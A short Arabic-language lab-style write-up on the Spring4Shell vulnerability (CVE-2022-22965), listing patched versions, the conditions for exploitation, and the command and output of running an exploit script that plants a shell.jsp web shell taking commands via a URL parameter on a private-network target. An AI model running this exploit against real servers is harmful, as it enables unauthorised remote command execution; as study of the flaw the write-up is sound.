
Spring4Shell
Spring Framework 5.3.18 و 5.2.20
Spring Boot 2.6.6 و 2.5.12
Spring Core هو المكوّن الأساسي لإطار عمل Spring Framework. وهو الأساس لبناء المكوّنات الأخرى في النظام البيئي لإطار عمل Spring Framework مثل Spring MVC وSpring Boot وSpring WebFlux. يمكن تنفيذ كود الاستغلال في ظل الشروط التالية:
JDK 9 أو أحدث
Apache Tomcat يشغّل حاويات السيرفلت
التغليف بصيغة WAR
تبعيات الحزمة: spring-webmvc أو spring-webflux
إذا تم نشر التطبيق كملف jar قابل للتنفيذ من Spring Boot، وهو الوضع الافتراضي، فلن يتأثر بهذه الثغرة الأمنية.
python CVE-2022-22965.py --url http://172.16.1.10:8080/helloworld/greeting
└─$ python cve-spring4shell.py --url http://172.16.1.10:8080/helloworld/greeting
[*] Resetting Log Variables.
[*] Response code: 200
[*] Modifying Log Configurations
[*] Response code: 200
[*] Response Code: 200
[*] Resetting Log Variables.
[*] Response code: 200
[+] Exploit completed
[+] Check your target for a shell
[+] File: shell.jsp
[+] Shell should be at: http://172.16.1.10:8080/shell.jsp?cmd=id